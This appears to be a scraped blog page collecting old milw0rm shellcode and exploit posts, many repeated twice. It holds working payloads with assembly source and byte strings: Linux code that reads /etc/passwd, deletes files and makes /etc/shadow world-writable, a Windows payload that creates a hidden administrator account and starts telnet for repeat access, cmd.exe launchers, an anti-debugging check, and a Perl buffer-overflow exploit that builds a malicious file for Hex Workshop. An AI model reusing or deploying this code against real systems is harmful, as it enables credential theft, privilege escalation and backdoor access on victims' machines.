/*
Author : darkjoker
Site : http://darkjoker.net23.net
Shellcode : linux/x86 Perl script execution 99 bytes + script length
.global _start
_start:
xor %eax, %eax
xor %ebx, %ebx
xor %ecx, %ecx
xor %edx, %edx
xor %edi, %edi
xor %esi, %esi
push %eax
push $0x6c702e30
push $0x30307470
push $0x69726373
mov %esp, %ebx
movb $0x5, %al
movb $0x41, %cl
int $0x80
jmp one
two:
mov %ebx, %esi
mov %eax, %ebx
pop %edi
push %edi
// Begin http://www.int80h.org/strlen/
xor %ecx, %ecx
xor %eax, %eax
not %ecx
repne scasb
not %ecx
dec %ecx
// End http://www.int80h.org/strlen/
pop %edi
mov %ecx, %eax
mov %edi, %ecx
mov %eax, %edx
movb $0x4, %al
int $0x80
movb $0x6, %al
int $0x80
mov %esi, %ebx
movb $0xf, %al
movw $0x1fc, %cx
int $0x80
movb $0xb, %al
xor %ecx, %ecx
xor %edx, %edx
int $0x80
movb $0x1, %al
xor %ebx, %ebx
int $0x80
one:
call two
.string "#!/usr/bin/perl\nprint (\"Hello world!\\n\");\n"
*/
char main [] =
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
"\x31\xff\x31\xf6\x50\x68\x30\x2e"
"\x70\x6c\x68\x70\x74\x30\x30\x68"
"\x73\x63\x72\x69\x89\xe3\xb0\x05"
"\xb1\x41\xcd\x80\xeb\x38\x89\xde"
"\x89\xc3\x5f\x57\x31\xc9\x31\xc0"
"\xf7\xd1\xf2\xae\xf7\xd1\x49\x5f"
"\x89\xc8\x89\xf9\x89\xc2\xb0\x04"
"\xcd\x80\xb0\x06\xcd\x80\x89\xf3"
"\xb0\x0f\x66\xb9\xfc\x01\xcd\x80"
"\xb0\x0b\x31\xc9\x31\xd2\xcd\x80"
"\xb0\x01\x31\xdb\xcd\x80\xe8\xc3"
"\xff\xff\xff"
"#!/usr/bin/perl\nprint (\"Hello world!\\n\");\n"; // Here script source
# milw0rm
Showing posts with label shellcode. Show all posts
Showing posts with label shellcode. Show all posts
linux/x86 File unlinker 18 bytes + file path length
/*
Author : darkjoker
Site : http://darkjoker.net23.net
Shellcode : linux/x86 File unlinker 18 bytes + file path length
.global _start
_start:
jmp one
two:
pop %ebx
movb $0xa,%al
int $0x80
movb $0x1, %al
xor %ebx, %ebx
int $0x80
one:
call two
.string "file"
*/
char main [] =
"\xeb\x0b\x5b\xb0\x0a\xcd\x80\xb0"
"\x01\x31\xdb\xcd\x80\xe8\xf0\xff"
"\xff\xff"
"file" //Here file path to delete
# milw0rm
Author : darkjoker
Site : http://darkjoker.net23.net
Shellcode : linux/x86 File unlinker 18 bytes + file path length
.global _start
_start:
jmp one
two:
pop %ebx
movb $0xa,%al
int $0x80
movb $0x1, %al
xor %ebx, %ebx
int $0x80
one:
call two
.string "file"
*/
char main [] =
"\xeb\x0b\x5b\xb0\x0a\xcd\x80\xb0"
"\x01\x31\xdb\xcd\x80\xe8\xf0\xff"
"\xff\xff"
"file" //Here file path to delete
# milw0rm
Linux/x86 file reader 65 bytes + pathname
/*
Linux/x86 file reader.
65 bytes + pathname
Author: certaindeath
Source code:
_start:
xor %eax, %eax
xor %ebx, %ebx
xor %ecx, %ecx
xor %edx, %edx
jmp two
one:
pop %ebx
movb $5, %al
xor %ecx, %ecx
int $0x80
mov %eax, %esi
jmp read
exit:
movb $1, %al
xor %ebx, %ebx
int $0x80
read:
mov %esi, %ebx
movb $3, %al
sub $1, %esp
lea (%esp), %ecx
movb $1, %dl
int $0x80
xor %ebx, %ebx
cmp %eax, %ebx
je exit
movb $4, %al
movb $1, %bl
movb $1, %dl
int $0x80
add $1, %esp
jmp read
two:
call one
.string "file_name"
*/
char main[]=
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
"\xeb\x32\x5b\xb0\x05\x31\xc9\xcd"
"\x80\x89\xc6\xeb\x06\xb0\x01\x31"
"\xdb\xcd\x80\x89\xf3\xb0\x03\x83"
"\xec\x01\x8d\x0c\x24\xb2\x01\xcd"
"\x80\x31\xdb\x39\xc3\x74\xe6\xb0"
"\x04\xb3\x01\xb2\x01\xcd\x80\x83"
"\xc4\x01\xeb\xdf\xe8\xc9\xff\xff"
"\xff"
"/etc/passwd"; //Put here the file path, default is /etc/passwd
# milw0rm
Linux/x86 file reader.
65 bytes + pathname
Author: certaindeath
Source code:
_start:
xor %eax, %eax
xor %ebx, %ebx
xor %ecx, %ecx
xor %edx, %edx
jmp two
one:
pop %ebx
movb $5, %al
xor %ecx, %ecx
int $0x80
mov %eax, %esi
jmp read
exit:
movb $1, %al
xor %ebx, %ebx
int $0x80
read:
mov %esi, %ebx
movb $3, %al
sub $1, %esp
lea (%esp), %ecx
movb $1, %dl
int $0x80
xor %ebx, %ebx
cmp %eax, %ebx
je exit
movb $4, %al
movb $1, %bl
movb $1, %dl
int $0x80
add $1, %esp
jmp read
two:
call one
.string "file_name"
*/
char main[]=
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
"\xeb\x32\x5b\xb0\x05\x31\xc9\xcd"
"\x80\x89\xc6\xeb\x06\xb0\x01\x31"
"\xdb\xcd\x80\x89\xf3\xb0\x03\x83"
"\xec\x01\x8d\x0c\x24\xb2\x01\xcd"
"\x80\x31\xdb\x39\xc3\x74\xe6\xb0"
"\x04\xb3\x01\xb2\x01\xcd\x80\x83"
"\xc4\x01\xeb\xdf\xe8\xc9\xff\xff"
"\xff"
"/etc/passwd"; //Put here the file path, default is /etc/passwd
# milw0rm
Win32 telnetbind by winexec 111 bytes
; payload:add admin acount & Telnet Listening
; Author: DATA_SNIPER
; size:111 bytes
; platform:WIN32/XP SP2 FR
; thanks:Arab4services team & AT4RE Team
; more info: visit my blog http://datasniper.arab4services.net
; The Sh3llcode:
; "\xEB\x08\xBA\x4D\x11\x86\x7C\xFF\xD2\xCC\xE8\xF3\xFF\xFF\xFF\x63\x6D\x64\x20\x2F\x63"
; "\x20\x6E\x65\x74\x20\x75\x73\x65\x72\x20\x68\x69\x6C\x6C\x20\x31\x32\x33\x34\x35"
; "\x36\x20\x2F\x41\x44\x44\x20\x26\x26\x20\x6E\x65\x74\x20\x6C\x6F\x63\x61\x6C\x67"
; "\x72\x6F\x75\x70\x20\x41\x64\x6D\x69\x6E\x69\x73\x74\x72\x61\x74\x65\x75\x72\x73"
; "\x20\x68\x69\x6C\x6C\x20\x2F\x41\x44\x44\x20\x26\x26\x20\x73\x63\x20\x73\x74\x61"
; "\x72\x74\x20\x54\x6C\x6E\x74\x53\x76\x72\x00"
; Description: it's simular to TCP BindShell on port 23,throught Command execution we can get shell access throught telnet service on Windows b0x.
; Add admin account command user=GAZZA ,pass=123456 :cmd /c net user GAZZA 123456 /ADD && net localgroup Administrateurs GAZZA /ADD
; Start telnet service: sc start TlntSvr
; For saving ur access to the B0x again and again :),u can use this command:
; "sc config TlntSvr start= auto & sc start TlntSvr" instead of:
; "sc start TlntSvr"
; NASM -s -fbin telnetbind.asm
BITS 32
db 0EBh,08h ;such as "jmp Data" ,i puted it in opcode format for avoiding null problem.
Exec:
MOV EDX,7C86114Dh ;WinExec addr in WIN XP SP2 FR
CALL EDX
INT3 ;just interrupter (hung the shellcode after it do his job,any way u can use ExitProcess) for avoiding infinite loop
Data:
CALL Exec
db 'cmd /c net user exploitvuln 123456 /ADD & net localgroup Administrateurs exploitvuln /ADD & sc start TlntSvr',00h
;add user exploitvuln with 123456 password and start telnet service ;BTW the exstension cuted for saving som byte ;)
#milw0rm
; Author: DATA_SNIPER
; size:111 bytes
; platform:WIN32/XP SP2 FR
; thanks:Arab4services team & AT4RE Team
; more info: visit my blog http://datasniper.arab4services.net
; The Sh3llcode:
; "\xEB\x08\xBA\x4D\x11\x86\x7C\xFF\xD2\xCC\xE8\xF3\xFF\xFF\xFF\x63\x6D\x64\x20\x2F\x63"
; "\x20\x6E\x65\x74\x20\x75\x73\x65\x72\x20\x68\x69\x6C\x6C\x20\x31\x32\x33\x34\x35"
; "\x36\x20\x2F\x41\x44\x44\x20\x26\x26\x20\x6E\x65\x74\x20\x6C\x6F\x63\x61\x6C\x67"
; "\x72\x6F\x75\x70\x20\x41\x64\x6D\x69\x6E\x69\x73\x74\x72\x61\x74\x65\x75\x72\x73"
; "\x20\x68\x69\x6C\x6C\x20\x2F\x41\x44\x44\x20\x26\x26\x20\x73\x63\x20\x73\x74\x61"
; "\x72\x74\x20\x54\x6C\x6E\x74\x53\x76\x72\x00"
; Description: it's simular to TCP BindShell on port 23,throught Command execution we can get shell access throught telnet service on Windows b0x.
; Add admin account command user=GAZZA ,pass=123456 :cmd /c net user GAZZA 123456 /ADD && net localgroup Administrateurs GAZZA /ADD
; Start telnet service: sc start TlntSvr
; For saving ur access to the B0x again and again :),u can use this command:
; "sc config TlntSvr start= auto & sc start TlntSvr" instead of:
; "sc start TlntSvr"
; NASM -s -fbin telnetbind.asm
BITS 32
db 0EBh,08h ;such as "jmp Data" ,i puted it in opcode format for avoiding null problem.
Exec:
MOV EDX,7C86114Dh ;WinExec addr in WIN XP SP2 FR
CALL EDX
INT3 ;just interrupter (hung the shellcode after it do his job,any way u can use ExitProcess) for avoiding infinite loop
Data:
CALL Exec
db 'cmd /c net user exploitvuln 123456 /ADD & net localgroup Administrateurs exploitvuln /ADD & sc start TlntSvr',00h
;add user exploitvuln with 123456 password and start telnet service ;BTW the exstension cuted for saving som byte ;)
#milw0rm
Hex Workshop v6 (.HEX File) Local Code Execution Exploit
#!/usr/bin/perl -w
# Hex Workshop <= v6 (.hex) File Local Code Execution
# Discovred by : Security^Ghost
# Exploited by : DATA_SNIPER
# Exploit Tested on WindoZ XP SP2 FR.
# for more information vist my blog:http://datasniper.arab4services.net/
# the exploit it's so weird ;),take look at the shellcode,and remember it's not AlphaNum.
print "==========================================================================\n";
print "Hex Workshop v6 (.HEX File) Local Code Execution\n";
print "Exploited by DATA_SNIPER\n";
print "Greetz to: arab4services team and AT4RE Team\n";
print "for more: http://datasniper.arab4services.net/\n";
print "===================================================================== \n";
$junk=":0000FC\x0D\x0A:";
$shelladd="B8EE1300D0EE1300C8EE1300AAAAAAAAC8EE1300C8EE1300";#shell address in the stack and some address junk for make the exploit work as well.
#some times the stack address change to "0012xxxx" so you can use this instead
# $shelladdrr="B8EE1200D0EE1200C8EE1200AAAAAAAAC8EE1200C8EE1200"
$nop="909090909090909090909090909090";# strange noop xD
#shellcode from metasploit,execute calc.exe
#shellcode copied as it's and when the data being treated will be converted to HEX format.
$shellcode="33c9b11ebbf01a028cdaccd97424f45a83c204315a0b035afbf8f77013b8f788e3cabdb468b038bd6fa6c87277b390ac86286726bc2579d68df9e38a693967d4b07085dbf06e62e0a0548f62ad1ed0a82cca893b2247dd6326560a104ad3cdccfbbfe9163860c3e0dec9478658c60cd868ad63c5dd3aebfd94c56f3dcc6518c0c864ab547096c6abd79830d0b60adc17";
$buff='A' x 248;
$sploit =$junk.$buff.$shelladd.$nop.$shellcode;
$fle = "Xploit.hex" ;
open($data, ">>$fle") or die "Cannot open $data";
print $data $sploit;
close($data);
print "$fle has been created\n";
print "open it in HexWorkshop file->import.\n";
# milw0rm
# Hex Workshop <= v6 (.hex) File Local Code Execution
# Discovred by : Security^Ghost
# Exploited by : DATA_SNIPER
# Exploit Tested on WindoZ XP SP2 FR.
# for more information vist my blog:http://datasniper.arab4services.net/
# the exploit it's so weird ;),take look at the shellcode,and remember it's not AlphaNum.
print "==========================================================================\n";
print "Hex Workshop v6 (.HEX File) Local Code Execution\n";
print "Exploited by DATA_SNIPER\n";
print "Greetz to: arab4services team and AT4RE Team\n";
print "for more: http://datasniper.arab4services.net/\n";
print "===================================================================== \n";
$junk=":0000FC\x0D\x0A:";
$shelladd="B8EE1300D0EE1300C8EE1300AAAAAAAAC8EE1300C8EE1300";#shell address in the stack and some address junk for make the exploit work as well.
#some times the stack address change to "0012xxxx" so you can use this instead
# $shelladdrr="B8EE1200D0EE1200C8EE1200AAAAAAAAC8EE1200C8EE1200"
$nop="909090909090909090909090909090";# strange noop xD
#shellcode from metasploit,execute calc.exe
#shellcode copied as it's and when the data being treated will be converted to HEX format.
$shellcode="33c9b11ebbf01a028cdaccd97424f45a83c204315a0b035afbf8f77013b8f788e3cabdb468b038bd6fa6c87277b390ac86286726bc2579d68df9e38a693967d4b07085dbf06e62e0a0548f62ad1ed0a82cca893b2247dd6326560a104ad3cdccfbbfe9163860c3e0dec9478658c60cd868ad63c5dd3aebfd94c56f3dcc6518c0c864ab547096c6abd79830d0b60adc17";
$buff='A' x 248;
$sploit =$junk.$buff.$shelladd.$nop.$shellcode;
$fle = "Xploit.hex" ;
open($data, ">>$fle") or die "Cannot open $data";
print $data $sploit;
close($data);
print "$fle has been created\n";
print "open it in HexWorkshop file->import.\n";
# milw0rm
win32 PEB!NtGlobalFlags shellcode 14 bytes
/*
PEB!NtGlobalFlags ( 14 BYTES )
Author: Koshi
Description: Uses PEB method to determine whether a debugger is
attached to the running proccess or not. No 9x. :(
Length: 14 Bytes
Registers Used: EAX,ESI,ESP
Compiled: jpXV34dd3v09Fh
*/
/*
00401000 > 6A 70 PUSH 70
00401002 58 POP EAX
00401003 56 PUSH ESI
00401004 333464 XOR ESI,DWORD PTR SS:[ESP]
00401007 64:3376 30 XOR ESI,DWORD PTR FS:[ESI+30]
0040100B 3946 68 CMP DWORD PTR DS:[ESI+68],EAX
JE DebuggerPresent ( If equal debugger attached )
*/
unsigned char Shellcode[] =
{"\x6A\x70\x58\x56\x33\x34\x64"
"\x64\x33\x76\x30\x39\x46\x68"};
int main( int argc, char *argv[] )
{
printf( "Shellcode is %u bytes.\n", sizeof(Shellcode)-1 );
printf( Shellcode, sizeof(Shellcode) );
return 0;
}
# milw0rm
win32 XP sp2 (FR) Sellcode cmd.exe 32 bytes
/*
windows/XP sp2 (FR) Sellcode cmd.exe 32 bytes
Author : Mountassif Moad
Big Thnx : Houssamix & SimO-s0fT
Changed by : Stack
Description : It is 32 Byte Shellcode which Execute Cmd.exe Tested Under Windows Xp SP2 FR
My first original shellcode Here http://www.milw0rm.com/shellcode/7971
because i receive every day full message who insult me (you'r lamer - fucker ->
you dont understand anything abouts sec ) infinity of insult
and the last time i receive an message have => i make full error in my first shelcode & in the end he
insult my mother & me (shit)
so i tell all people when want insult anyone remembers we are just human not angel
euuuh : i'm decide to write another small shellcode this time just for fun (32 bytes xd )
Assembly Code : this time is not a secret (:@)
00402000 8BEC MOV EBP,ESP
00402002 33FF XOR EDI,EDI
00402004 57 PUSH EDI
00402005 C645 FC 63 MOV BYTE PTR SS:[EBP-4],63
00402009 C645 FD 6D MOV BYTE PTR SS:[EBP-3],6D
0040200D C645 FE 64 MOV BYTE PTR SS:[EBP-2],64
00402011 C645 F8 01 MOV BYTE PTR SS:[EBP-8],1
00402015 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]
00402018 50 PUSH EAX
00402019 B8 C793BF77 MOV EAX,msvcrt.system (i notice this for work in other machine)
0040201E FFD0 CALL EAX
*/
#include "stdio.h"
unsigned char shellcode[] =
"\x8B\xEC\x33\xFF\x57"
"\xC6\x45\xFC\x63\xC6\x45"
"\xFD\x6D\xC6\x45\xFE\x64"
"\xC6\x45\xF8\x01\x8D"
"\x45\xFC\x50\xB8\xC7\x93"
"\xBF\x77\xFF\xD0";
int main ()
{
int *ret;
ret=(int *)&ret+2;
printf("Shellcode Length is : %d\n",strlen(shellcode));
(*ret)=(int)shellcode;
return 0;
}
# milw0rm
windows/XP sp2 (FR) Sellcode cmd.exe 32 bytes
Author : Mountassif Moad
Big Thnx : Houssamix & SimO-s0fT
Changed by : Stack
Description : It is 32 Byte Shellcode which Execute Cmd.exe Tested Under Windows Xp SP2 FR
My first original shellcode Here http://www.milw0rm.com/shellcode/7971
because i receive every day full message who insult me (you'r lamer - fucker ->
you dont understand anything abouts sec ) infinity of insult
and the last time i receive an message have => i make full error in my first shelcode & in the end he
insult my mother & me (shit)
so i tell all people when want insult anyone remembers we are just human not angel
euuuh : i'm decide to write another small shellcode this time just for fun (32 bytes xd )
Assembly Code : this time is not a secret (:@)
00402000 8BEC MOV EBP,ESP
00402002 33FF XOR EDI,EDI
00402004 57 PUSH EDI
00402005 C645 FC 63 MOV BYTE PTR SS:[EBP-4],63
00402009 C645 FD 6D MOV BYTE PTR SS:[EBP-3],6D
0040200D C645 FE 64 MOV BYTE PTR SS:[EBP-2],64
00402011 C645 F8 01 MOV BYTE PTR SS:[EBP-8],1
00402015 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]
00402018 50 PUSH EAX
00402019 B8 C793BF77 MOV EAX,msvcrt.system (i notice this for work in other machine)
0040201E FFD0 CALL EAX
*/
#include "stdio.h"
unsigned char shellcode[] =
"\x8B\xEC\x33\xFF\x57"
"\xC6\x45\xFC\x63\xC6\x45"
"\xFD\x6D\xC6\x45\xFE\x64"
"\xC6\x45\xF8\x01\x8D"
"\x45\xFC\x50\xB8\xC7\x93"
"\xBF\x77\xFF\xD0";
int main ()
{
int *ret;
ret=(int *)&ret+2;
printf("Shellcode Length is : %d\n",strlen(shellcode));
(*ret)=(int)shellcode;
return 0;
}
# milw0rm
linux/x86 chmod("/etc/shadow",666) & exit(0) 30 bytes
/*
Linux/x86 - chmod("/etc/shadow",666) & exit(0)
Info reg
------------------
%eax = 15
%ebx = /etc/shadow
%ecx = 666
%eax = 1
%ebx = 0
Shellcode 30 bytes
Author: Jonathan Salwan <>
Web: http://www.shell-storm.org
Disassembly of section .text:
08048054 <.text>:
8048054: 51 push %ecx
8048055: 66 b9 b6 01 mov $0x1b6,%cx
8048059: 68 61 64 6f 77 push $0x776f6461
804805e: 68 63 2f 73 68 push $0x68732f63
8048063: 68 2f 2f 65 74 push $0x74652f2f
8048068: 89 e3 mov %esp,%ebx
804806a: 6a 0f push $0xf
804806c: 58 pop %eax
804806d: cd 80 int $0x80
804806f: 40 inc %eax
8048070: cd 80 int $0x80
*/
#include "stdio.h"
int main(int argc, char *argv[])
{
char shellcode[] = "\x51\x66\xb9\xb6"
"\x01\x68\x61\x64"
"\x6f\x77\x68\x63" // chmod("/etc/shadow",666)
"\x2f\x73\x68\x68"
"\x2f\x2f\x65\x74"
"\x89\xe3\x6a\x0f"
"\x58\xcd\x80"
"\x40\xcd\x80"; // exit(0);
printf("Length: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();
return 0;
}
# milw0rm
Subscribe to:
Posts (Atom)
Posts
